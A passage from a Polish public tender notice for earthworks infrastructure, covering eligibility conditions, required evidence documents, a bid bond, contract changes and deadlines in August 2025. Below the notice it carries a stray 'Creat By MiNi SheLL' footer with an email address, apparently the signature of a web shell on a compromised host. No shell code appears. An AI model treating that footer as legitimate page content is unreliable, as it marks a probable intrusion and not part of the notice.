lub remontu infrastruktury ziemnej. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o których mowa w rozdziale 9 SWZ. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, przy czym żaden z nich nie może podlegać wykluczeniu z postępowania. W przypadku wspólnego ubiegania się o zamówienie, warunki udziału w postępowaniu powinni spełniać łącznie wszyscy Wykonawcy, z zastrzeżeniem, że warunek dotyczący doświadczenia w zakresie wykonanych robót budowlanych (pkt 7.1. ppkt 4 lit. a) musi spełniać co najmniej jeden z tych Wykonawców. W odniesieniu do doświadczenia w zakresie wykonanych robót budowlanych, wymaganego w pkt 7.1. ppkt 4) lit. a), Zamawiający wymaga, aby wykazał się nim konsorcjant, który będzie wykonywał kluczowy zakres robót. Wykonawcy wspólnie ubiegający się o zamówienie dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. W przypadku powoływania się na zasoby podmiotu udostępniającego zasoby celem wykazania spełniania warunku doświadczenia, warunek ten winien spełniać co najmniej jeden z takich podmiotów lub Wykonawca, a w przypadku wykonawców wspólnie ubiegających się o zamówienie – co najmniej jeden z takich Wykonawców. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane, do realizacji których te zdolności są wymagane. Zamawiający ocenia, czy udostępniane zdolności pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec podmiotu udostępniającego zasoby podstawy wykluczenia. Jeżeli udostępniane zdolności nie potwierdzają spełniania warunków lub zachodzą podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w wyznaczonym terminie zastąpił ten podmiot innym lub wykazał, że samodzielnie spełnia warunki. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał na nich w danym zakresie. Zamawiający może uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez niego sprzecznych interesów lub zaangażowanie zasobów w inne przedsięwzięcia gospodarcze może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia, o których mowa w art. 108 ust. 1 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, a także braku podstaw wykluczenia, o których mowa w art. 109 ust. 1 pkt 1 i 4 ustawy Pzp, Wykonawca zobowiązany jest złożyć oświadczenie wykonawcy o braku podstaw wykluczenia z postępowania, sporządzone według wzoru stanowiącego Załącznik nr 2a do SWZ. Dodatkowo, wymagany jest odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp. W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, bądź w przypadku wspólnego ubiegania się o zamówienie, należy złożyć odpowiednio dokumenty potwierdzające brak podstaw wykluczenia, o których mowa w pkt 8.1. ppkt 1)-2) SWZ dla każdego z tych podmiotów, w zakresie, w jakim każdy z nich miałby spełnić przesłanki wykluczenia. Jeżeli Wykonawca, podmiot udostępniający zasoby lub wykonawcy wspólnie ubiegający się o zamówienie, mają siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający wymaga dokumentów wymienionych w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia. W przypadku, gdy Wykonawca podlega wykluczeniu na podstawie okoliczności określonych w art. 108 ust. 1 pkt 1, 2 i 5 lub art. 109 ust. 1 pkt 4 ustawy Pzp, a udowadnia Zamawiającemu, że spełnił przesłanki self-cleaning, powinien przedstawić dowody potwierdzające podjęcie środków naprawczych. Obejmuje to dowody naprawienia lub zobowiązania się do naprawienia szkody, wyczerpujące wyjaśnienia faktów i okoliczności związanych z nieprawidłowym postępowaniem oraz dowody podjęcia konkretnych środków technicznych, organizacyjnych i kadrowych zapobiegających dalszym nieprawidłowościom.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, Wykonawca zobowiązany jest złożyć wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Wykaz ten musi zawierać wartość, przedmiot, daty wykonania i podmioty, na rzecz których roboty zostały wykonane. Należy dołączyć dowody należytego wykonania tych robót, takie jak referencje lub inne odpowiednie dokumenty. Z wykazu oraz dołączonych dowodów musi wynikać, że wykonane zamówienie dotyczyło budowy, przebudowy lub remontu infrastruktury ziemnej o wartości co najmniej 100 000,00 zł brutto. Dodatkowo, wymagany jest wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi. Wykaz ten powinien zawierać informacje o ich kwalifikacjach zawodowych, uprawnieniach, doświadczeniu i funkcji, jaką będą pełnić przy realizacji zamówienia, a także informację o podstawie do dysponowania tymi osobami. Z wykazu musi wynikać, że Wykonawca dysponuje co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej (lub równoważne) oraz która pełniła funkcję kierownika robót przy realizacji co najmniej jednej inwestycji w zakresie budowy, przebudowy lub remontu infrastruktury ziemnej. W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, do oferty dołączają oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. Jeśli Wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, zobowiązany jest złożyć zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie to powinno wyraźnie wskazywać zakres udostępnianych zasobów, sposób i okres ich udostępnienia oraz, czy i w jakim zakresie podmiot udostępniający zasoby będzie uczestniczył w realizacji zamówienia. Dodatkowo, w przypadku polegania na doświadczeniu podmiotu udostępniającego zasoby, należy złożyć dokumenty potwierdzające spełnianie warunków udziału w postępowaniu w tym zakresie (wykaz robót budowlanych i wykaz osób). Dokumenty te powinny potwierdzać, że warunek doświadczenia spełnia co najmniej jeden z takich podmiotów lub Wykonawca, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia co najmniej jeden z takich Wykonawców.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawców przedłożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy zobowiązani są do przedłożenia następujących innych oświadczeń lub dokumentów wraz z ofertą: Formularz Oferty sporządzony według wzoru stanowiącego Załącznik nr 1 do SWZ, wraz z Kosztorysem Ofertowym, sporządzone pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 Pzp (Załącznik nr 2a do SWZ), podpisane przez osobę/osoby upoważnione do reprezentacji, sporządzone pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W przypadku wspólnego ubiegania się o udzielenie zamówienia, oświadczenie to składane jest przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia i potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału. Jeśli Wykonawca polega na zasobach innych podmiotów, wymagane jest oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 5 Pzp (Załącznik nr 2b do SWZ), podpisane przez osobę/osoby upoważnione do reprezentacji, sporządzone pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W takiej sytuacji konieczne jest również zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający dysponowanie tymi zasobami, zgodnie z pkt 9.3. SWZ, podpisane przez osobę/osoby upoważnione (niewiążący wzór zobowiązania stanowi Załącznik nr 8 do SWZ). W przypadku, gdy Zamawiający nie może uzyskać danych z bezpłatnych i ogólnodostępnych baz danych, Wykonawca musi przedłożyć odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru w celu potwierdzenia umocowania osoby działającej w imieniu Wykonawcy/podmiotu udostępniającego zasoby do jego reprezentowania. Jeżeli umocowanie osoby działającej w imieniu Wykonawcy/podmiotu udostępniającego zasoby nie wynika z innych złożonych dokumentów, należy dołączyć pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania, sporządzone pod rygorem nieważności w formie elektronicznej lub w formie określonej w pkt 9.14-9.16 SWZ. W przypadku, gdy ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, wymagane jest pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, sporządzone w formie elektronicznej lub w formie określonej w pkt 9.14-9.16. SWZ. Należy również złożyć podmiotowy środek dowodowy w postaci oświadczenia, o którym mowa w art. 117 ust. 4 Pzp (Zamawiający rekomenduje wykorzystanie oświadczenia znajdującego się w Formularzu Oferty). Wadium w oryginale w postaci elektronicznej wymagane jest tylko, gdy Wykonawca wnosi wadium w formie niepieniężnej. Dokumenty składane wraz z ofertą, w tym pełnomocnictwa, powinny zostać sporządzone w sposób określony w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 10 000 zł. Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 Pzp. Wadium może być wnoszone w pieniądzu, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w Banku Gospodarstwa Krajowego nr rachunku: 26 1130 1017 0020 1381 5690 0001 z dopiskiem: „Wadium w postępowaniu znak: 5.2025.KPN&#34;. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego. Zamawiający przechowuje wadium wniesione w pieniądzu na rachunku bankowym. Z treści wadium wnoszonego w formie gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 Pzp. Wadium wnoszone w formie gwarancji lub poręczenia należy przekazać Zamawiającemu wraz z ofertą w oryginale w postaci elektronicznej (art. 97 ust. 10 Pzp). Wadium musi zabezpieczać ofertę przez cały okres związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 Pzp. Treść gwarancji wadialnej musi zawierać nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib. Musi również określać wierzytelność, która ma być zabezpieczona gwarancją/poręczeniem, przedmiot zamówienia, kwotę gwarancji/poręczenia oraz zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 Pzp. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga, aby w treści wadium wnoszonego w formach gwarancji lub poręczenia zostali wymienieni wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia albo powinno z niej wynikać, że Wykonawca, na którego gwarancja/poręczenie zostały wystawione działa w imieniu innych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, bądź w ich treści powinien zostać ujęty szerszy zakres odpowiedzialności gwaranta/poręczyciela niż tylko dotyczący działań/zaniechań odnoszących się do Wykonawcy, na którego gwarancja/poręczenie to zostało wystawione. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1-5 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania. Warunki udziału w postępowaniu określone w pkt 7.2 SWZ powinni spełniać łącznie wszyscy Wykonawcy , z zastrzeżeniem, iż warunek dotyczący należytego wykonania co najmniej jednego zamówienia o określonej wartości (pkt 7.2 ppkt 4 lit. a) winien spełniać co najmniej jeden z tych Wykonawców. W odniesieniu do tego warunku, Zamawiający wymaga, aby doświadczeniem w zakresie wykonanych robót budowlanych wykazał się konsorcjant, który będzie wykonywał kluczowy zakres robót. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. W odniesieniu do podmiotowych środków dowodowych, w przypadku wspólnego ubiegania się o zamówienie, wykonawcy zobowiązani są złożyć dokumenty potwierdzające brak podstaw wykluczenia dla każdego z tych podmiotów, w zakresie, w jakim każdy z nich miałby spełnić przesłanki wykluczenia. Jeśli chodzi o oświadczenia składane wraz z ofertą, w przypadku wspólnego ubiegania się o udzielenie zamówienia, oświadczenie wykonawcy o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu (Załącznik nr 2a do SWZ) składane jest przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia Wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Ponadto, jeżeli ofertę składają Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, do oferty należy dołączyć pełnomocnictwo lub inny dokument potwierdzający umocowanie dla pełnomocnika ustanowionego do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo to powinno być sporządzone pod rygorem nieważności w formie elektronicznej (tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, bądź w formie określonej w pkt 9.14-9.16 SWZ. Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, musi zawierać wymienionych wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo powinno z niego wynikać, że Wykonawca, na którego gwarancja/poręczenie zostały wystawione, działa w imieniu innych Wykonawców wspólnie ubiegających się o udzielenie zamówienia, bądź w ich treści powinien zostać ujęty szerszy zakres odpowiedzialności gwaranta/poręczyciela niż tylko dotyczący działań/zaniechań odnoszących się do Wykonawcy, na którego gwarancja/poręczenie to zostało wystawione. Najpóźniej w dniu zawarcia umowy, w przypadku, gdy zamówienie realizują Wykonawcy, którzy wspólnie ubiegali się o udzielenie zamówienia (konsorcjum), jeden z Wykonawców powinien zostać wyznaczony jako Wykonawca kierujący (lider), upoważniony do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Możliwość ta istnieje w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych we wzorze umowy stanowiącym Załącznik nr 6 do SWZ. Warunki wprowadzenia tych zmian są szczegółowo określone w tym wzorze umowy. Oznacza to, że wszelkie dopuszczalne modyfikacje umowy oraz przesłanki ich zastosowania są zawarte w projekcie umowy, który stanowi integralną część Specyfikacji Warunków Zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dodatkowo, Zamawiający informuje, że nie dopuszcza składania ofert wariantowych oraz nie przewiduje zawarcia umowy ramowej. Nie przewiduje się także wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej. Zamawiający nie wymaga złożenia ofert w postaci katalogów elektronicznych. Wykonawca ponosi wszystkie koszty związane z przygotowaniem i złożeniem oferty, a Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. Nie przewiduje się również obowiązku odbycia przez Wykonawcę wizji lokalnej lub sprawdzenia dokumentów niezbędnych do realizacji zamówienia. Postępowanie prowadzone jest w języku polskim. W przypadku jakichkolwiek rozbieżności pomiędzy treścią ogłoszenia a Specyfikacją Warunków Zamówienia (SWZ), decydujące znaczenie mają postanowienia SWZ. Wykonawca zobowiązany jest do zrealizowania całości przedmiotu zamówienia w terminie nie dłuższym niż 90 dni kalendarzowych od dnia zawarcia umowy, jednak nie później niż do dnia 15 stycznia 2026 r. Wykonawca, którego oferta została wybrana jako najkorzystniejsza zobowiązany jest przed podpisaniem umowy, do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 2% ceny całkowitej podanej w ofercie.

Creat By MiNi SheLL
Email: jattceo@gmail.com